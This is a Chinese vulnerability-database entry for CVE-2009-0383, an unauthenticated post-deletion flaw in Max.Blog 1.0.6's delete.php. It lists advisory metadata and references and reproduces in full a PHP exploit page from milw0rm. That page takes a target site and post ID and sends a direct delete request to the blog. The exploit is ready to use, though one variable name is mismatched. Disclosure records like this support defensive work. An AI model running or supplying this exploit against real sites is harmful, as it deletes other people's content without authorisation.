Mzbservices Max.Blog 'delete.php' Delete Post身份认证绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117268 漏洞类型 权限许可和访问控制
发布时间 2009-01-20 更新时间 2009-02-02
CVE编号 CVE-2009-0383 CNNVD-ID CNNVD-200902-008
漏洞平台 PHP CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/7835
https://cxsecurity.com/issue/WLB-2009020084
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-008
|漏洞详情
Max.Blog是开放源码的博客发布和管理工具。Max.Blog1.0.6版本中的delete.php没有正确的限制访问,这使得远程攻击者可以借助一个直接请求,删除任意博客存储。
|漏洞EXP
<html>
<head>
<title>Max.Blog 1.0.6 Delete Post Exploit</title>
</head>

<body>
<p align="center">
<b>Max.Blog 1.0.6 Delete Post Exploit</b><br /><br />
<b>Discovered by <b>SirGod</b><br />
Thanks to <b>Nytro</b><br />
Please visit : <br />
------------------------<br />
www.mortal-team.org<br />
------------------------<br />
www.h4cky0u.org<br />
------------------------<br />
www.xpl0it.info<br />
------------------------<br />
www.anti-intruders.org<br />
------------------------<br />
</b>
</p>

<?php
if(isset($_POST['submit']))
{
    $site=$_POST['site'];
	$id=$_POST['post_id'];
	$pagina=file_get_contents("http://".$site."/delete.php?post=".$post_id."&confirm=yes");
	print "<p align=\"center\">Done!</p><br />";
}

?>

<form method="POST">
<p align="center">
Site: www. <input type="text" name="site" value="site.com/path" /><br
/> (without http,www and trailing slash)<br />
Post ID: <input type="text" name="post_id" value="1" /><br /><br />
<input type="submit" name="submit" value="Delete" />
</p>
</form>
</body>
</html>

# milw0rm.com [2009-01-20]
|参考资料

来源:www.mzbservices.com
链接:http://www.mzbservices.com/show_post.php?id=72
来源:SECUNIA
名称:33590
链接:http://secunia.com/advisories/33590
来源:XF
名称:maxblog-delete-security-bypass(48125)
链接:http://xforce.iss.net/xforce/xfdb/48125
来源:BID
名称:33368
链接:http://www.securityfocus.com/bid/33368
来源:MILW0RM
名称:7835
链接:http://www.milw0rm.com/exploits/7835
来源:OSVDB
名称:51482
链接:http://osvdb.org/51482